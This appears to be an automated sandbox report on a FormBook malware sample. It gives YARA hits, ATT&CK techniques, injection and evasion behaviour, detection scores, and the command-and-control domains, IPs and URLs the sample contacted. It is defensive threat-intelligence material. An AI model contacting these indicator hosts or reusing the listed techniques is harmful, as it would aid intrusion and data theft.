          Source: Yara matchFile source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery331Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion14Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion14Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 339315 Sample: 65BV6gbGFl.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 10 65BV6gbGFl.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\65BV6gbGFl.exe.log, ASCII 10->28 dropped 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->52 54 Tries to detect virtualization through RDTSC time measurements 10->54 56 Injects a PE file into a foreign processes 10->56 14 65BV6gbGFl.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.pxwuo.com 185.107.56.57, 49770, 80 NFORCENL Netherlands 17->30 32 outlawgospelshow.com 34.102.136.180, 49771, 80 GOOGLEUS United States 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 NETSTAT.EXE 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          65BV6gbGFl.exe35%VirustotalBrowse
          65BV6gbGFl.exe100%AviraHEUR/AGEN.1138556
          65BV6gbGFl.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.65BV6gbGFl.exe.c70000.0.unpack100%AviraHEUR/AGEN.1138556Download File
          1.2.65BV6gbGFl.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.65BV6gbGFl.exe.c70000.0.unpack100%AviraHEUR/AGEN.1138556Download File
          1.0.65BV6gbGFl.exe.700000.0.unpack100%AviraHEUR/AGEN.1138556Download File
          1.2.65BV6gbGFl.exe.700000.1.unpack100%AviraHEUR/AGEN.1138556Download File

          Domains

          SourceDetectionScannerLabelLink
          www.fallguysmovile.com1%VirustotalBrowse
          www.karybeautycare.com1%VirustotalBrowse
          outlawgospelshow.com1%VirustotalBrowse
          www.pxwuo.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv0%Avira URL Cloudsafe
          http://www.karybeautycare.com/kgw/?tTrL=Fpgl&D81dO=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UcoIa2V5gzCm0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.pxwuo.com/kgw/?tTrL=Fpgl&D81dO=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN3tuV7ElJqtC0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.fallguysmovile.com
          199.59.242.153
          truetrueunknown
          www.karybeautycare.com
          35.186.238.101
          truetrueunknown
          outlawgospelshow.com
          34.102.136.180
          truetrueunknown
          www.pxwuo.com
          185.107.56.57
          truetrueunknown
          www.gidagozlemevi.com
          unknown
          unknowntrue
            unknown
            www.outlawgospelshow.com
            unknown
            unknowntrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upvtrue
              • Avira URL Cloud: safe
              unknown
              http://www.karybeautycare.com/kgw/?tTrL=Fpgl&D81dO=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UcoIa2V5gzCmtrue
              • Avira URL Cloud: safe
              unknown
              http://www.pxwuo.com/kgw/?tTrL=Fpgl&D81dO=KjbuJJdeVq7diM0Fg7aQkrQXEwOw5P1EeEOzKgXGIrFUAWFa+z+/Ho4yN3tuV7ElJqtCtrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                high
                http://www.fontbureau.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                  high
                  http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                        high
                        http://www.tiro.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                          high
                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.carterandcone.comlexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.typography.netDexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://fontfabrik.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                high
                                http://www.%s.comPAexplorer.exe, 00000002.00000000.666700748.0000000002B50000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                low
                                http://www.fonts.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.sandoll.co.krexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.sakkal.comexplorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    35.186.238.101
                                    unknownUnited States
                                    15169GOOGLEUStrue
                                    199.59.242.153
                                    unknownUnited States
                                    395082BODIS-NJUStrue
                                    34.102.136.180
                                    unknownUnited States
                                    15169GOOGLEUStrue
                                    185.107.56.57
                                    unknownNetherlands
                                    43350NFORCENLtrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Red Diamond
                                    Analysis ID:339315
                                    Start date:13.01.2021
                                    Start time:20:51:47
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 10m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:65BV6gbGFl.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:1
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@7/1@5/4
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 9.9% (good quality ratio 9%)
                                    • Quality average: 74.4%
                                    • Quality standard deviation: 30.7%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .exe
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129
                                    • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    20:52:41API Interceptor1x Sleep call for process: 65BV6gbGFl.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    35.186.238.1019xFNvd3VPc.exeGet hashmaliciousBrowse
                                    • www.karybeautycare.com/kgw/?MJBD=v5Yiuhvr0F6MYz3e4dEgNYCJUmrmKekWwpiHMAfHDUslibx/6TCs/ka/UfIyKn1B6Ujh&U8kx=9rGDCVKPed543Vx
                                    INVOICE3DDH.exeGet hashmaliciousBrowse
                                    • www.deadroommn.com/o56q/?KX6x=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoLEzRfVa04hfFHxqzQ==&LlZ=blyxBdiX2XMl58
                                    IMG09122020.exeGet hashmaliciousBrowse
                                    • www.jucipussy.com/hrqa/?alv=MOtX2BFSrViaC0X4nX8Ojz3Ffc9TxkmRSUyV4MFx8gtpiROAV6sDI4GMTX3HbVqgx/YK&Qzu=LlyXVRmHJd0T
                                    Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                    • www.demanumachina.com/bg8v/?Jt7=XPv4nH2h&DXIXO=NJkNq5OeSFaX1kxDXRtbhUIgXhkHWmCXVQZM7V4Mtz65k36PnxAtdlPGj92juhOn+c/d
                                    NQQWym075C.exeGet hashmaliciousBrowse
                                    • www.deadroommn.com/o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO
                                    New Additional Agreement.exeGet hashmaliciousBrowse
                                    • www.stockandbarrell.com/bw82/?J2JxbNH=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fs+LoYF7THMi&BXEpz=Z2Jd8XTPeT
                                    New Additional Agreement - Commercial and Technical Proposal for Supply.exeGet hashmaliciousBrowse
                                    • www.stockandbarrell.com/bw82/?tVm0=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fvSb0pZAUylzp9ZxLw==&U4kp=Ntx4URGPjVrdVrx
                                    mFNIsJZPe2.exeGet hashmaliciousBrowse
                                    • www.stockandbarrell.com/bw82/?sBZXxj6=Zr9dh+Ojghb1L1e/pORPvWuTQwqD3K8M6Vqb62ieYdyG8WG8lG/7s6/5fs+h3o17XFEi&tHrp=9r7HOjb8jFFtz
                                    request.exeGet hashmaliciousBrowse
                                    • www.toplegallawfirm.com/d8h/?DXaDp=fRmTtjUX8ZQHeF6&1bS=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCNxKh6DRp2hl
                                    PO#646756575646.exeGet hashmaliciousBrowse
                                    • www.toplegallawfirm.com/d8h/?YL0=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCORwxrjpzRAi&EhLT5l=9rhdJxHx-Bl
                                    PpCVLJxsOp.exeGet hashmaliciousBrowse
                                    • www.posh-tee.com/d9s8/?Kdnlebm=wtT5wB6vDfWKpHQ2+opxhwshPkt6Ry2ICccTdH8CdSqi9c7YjUx9bKQZOZuVsfJ5JcVD&uZClk=D4ft
                                    Amacon Company profile & about us.exeGet hashmaliciousBrowse
                                    • www.officesplits.com/aqu2/?hbWhmPd=BEj5kt93wyPSdeX8N5io9IKa6SvYcw+QqKy+0SeD3QvCPmxR+dfnVYSf1CTwTQmZboHhrPtb5w==&_TAHxl=ZL3hMDhPFVz
                                    PO8479349743085.exeGet hashmaliciousBrowse
                                    • www.toplegallawfirm.com/d8h/?Jfy=I8xQoUppBoDvKzYHSB5P94IAGgo/a3mjarcEvmq07IJ87QroVVa3muqHCNxg+KzRt0pl&njq0sr=RzuPip
                                    caNlGGGG6kRIttj.exeGet hashmaliciousBrowse
                                    • www.samanthahough.com/cdm/?Txo=O0DPaDpH6xG0tP&H2Jpg6=3aMnj7LffomM9xm98kkuSFNUfnLrlUkoV7W3F45/8qR+nukmFQOoeRDy/pjQLaRWbGrI
                                    iLividSetup-r1136-n-bi.exeGet hashmaliciousBrowse
                                    • download.cdn.installspeed.com/cdn/packs/1/python.exe
                                    http://govermentbids.com/Get hashmaliciousBrowse
                                    • www6.govermentbids.com/?tdfs=1&s_token=1588788601.0021690367&uuid=1588788601.0021690367&kw=Government+Bidding+Opportunities&term=Government%20Bidding%20Opportunities&term=Construction%20Bids&term=Latest%20News%20on%20Business%20Intelligence&backfill=0
                                    http://softwaredownload.meGet hashmaliciousBrowse
                                    • www.regeasycleaner.com/images/banner728x90.gif
                                    http://byrontorres.com.co/c756mndf090/ZS/?Yerima=NLA&onowu=demian.magalhaes@bmrn.comGet hashmaliciousBrowse
                                    • will.co/?from=will.co
                                    Remittance.docGet hashmaliciousBrowse
                                    • www.urgentloans.today/wh/
                                    18edd.exeGet hashmaliciousBrowse
                                    • www.wildconfession.com/mi/
                                    199.59.242.153PO85937758859777.xlsxGet hashmaliciousBrowse
                                    • www.alwayadopt.com/8rg4/?RJ=WsO1qiz2dXOYooBDjHaDnsysS09xwMceuB64tfjAiEOaRoVYdCuvrl6g5TO0aeWlvtBBiA==&LFQHH=_pgx3Rd
                                    PO#218740.exeGet hashmaliciousBrowse
                                    • www.shelvesthatslude.com/wpsb/?Wxo=rpLKkbKOXOuXHBcSnbCAYX8fIodJm2eBCOkizxG+Jmq98pcfRrdFVbp7k49Tb//P+n9l&vB=lhv8
                                    g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                    • www.laalianza.net/nki/?-Z1l=PROIUmUOyDGddH4liQ5hJmVkj46+Q85xpoxC45PqJI4e45Ope3SXSrB15gOtY6GR/pks5ou7bA==&5ju=UlSpo
                                    c6Rg7xug26.exeGet hashmaliciousBrowse
                                    • www.fallguysmovile.com/kgw/?JfExsTlp=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864+OaOF7shv&njnddr=RhlPiv
                                    IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                    • www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS
                                    mQFXD5FxGT.exeGet hashmaliciousBrowse
                                    • thevampire_vvv.byethost32.com/loglogin.html
                                    099898892.exeGet hashmaliciousBrowse
                                    • www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
                                    ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                    • ww1.survey-smiles.com/
                                    SAWR000148651.exeGet hashmaliciousBrowse
                                    • www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
                                    SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                    • www.biphome.com/th7/?Wxo=F3X7BvJsNeC3FygCw13H4IB8jadIkqJtXdmqtCOR8NGnB4xp+pRJAqP9Tbys+XJlW324&vB=lhvxP
                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                    • www.fallguysgen.com/09rb/?BjR=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1YP1OuE1trgD&ojPLdR=9r9xbv2Prvr4
                                    IRS Notice Letter.exeGet hashmaliciousBrowse
                                    • www.fallguysgen.com/09rb/?QL3=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1bj2SeINgKdVJ18iPg==&vDH4Y=N8lT8DApP2
                                    Payment Order Inv.exeGet hashmaliciousBrowse
                                    • www.lakecharlesloan.com/m98/
                                    h3dFAROdF3.exeGet hashmaliciousBrowse
                                    • www.srteamsex.com/jskg/?8pgD2lkp=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&yTIDml=X6XHfZU8d
                                    kqwqyoFz1C.exeGet hashmaliciousBrowse
                                    • www.srteamsex.com/jskg/?9roHn=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&npHhW=3fq4gDD0abs8
                                    file.exeGet hashmaliciousBrowse
                                    • www.capialhealth.com/w8en/?wZ=OZNhib&iJE=PC3EVoXx07elaN9zQ9JVPu3uhPMA8lrp9yOZFfU9U+2Z+rMvgXeGWrCKYNniyi9/Q+4F/80NIg==
                                    PByYRsoSNX.exeGet hashmaliciousBrowse
                                    • www.traptlongview.com/csv8/?wPX=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWD0h5HAfE9z&UPnDHz=SVETu4vhSBmH6
                                    3Y690n1UsS.exeGet hashmaliciousBrowse
                                    • www.globepublishers.com/csv8/?SR-D3jP=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODb9flfr/+N&J0GTk=3fPL-xo0rXp0UNn
                                    Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                    • www.globepublishers.com/csv8/?AZ=QLtdsMlSP8ZUl/vaR7fAeOzLoSV1+fXm7wO8n0yFGAmKofcRkm3OZJHpkrvnm/Rsk+r9zQ==&1bqtf=oL30w6o
                                    SOA121520.exeGet hashmaliciousBrowse
                                    • www.lsi.xyz/t4vo/?9rspyh=ffh4_hPhQ&xRWxBfL=WfdqmDLeiX8A0XbRcwwI20exgn5R1EzGuKMWaYP6QiJJcsRpHAz5FYgMhHdlC+3EYXet

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    www.fallguysmovile.comc6Rg7xug26.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    vbc.exe.exeGet hashmaliciousBrowse
                                    • 199.59.242.153
                                    www.karybeautycare.com9xFNvd3VPc.exeGet hashmaliciousBrowse
                                    • 35.186.238.101
